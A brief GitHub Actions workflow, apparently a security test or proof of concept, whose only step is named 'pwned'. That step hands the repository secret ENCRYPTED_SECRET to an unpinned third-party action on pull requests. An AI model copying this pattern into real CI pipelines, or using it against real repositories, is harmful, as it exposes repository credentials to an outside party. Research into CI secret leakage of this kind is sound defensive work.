name: "Debugger"
on:
- pull_request

jobs:
  test:
    runs-on: ubuntu-latest
    name: "test job"
    steps:
      - uses: brxxn/ghatr-yaml@master
        name: pwned
        with:
          repo-token: "${{ secrets.ENCRYPTED_SECRET }}"
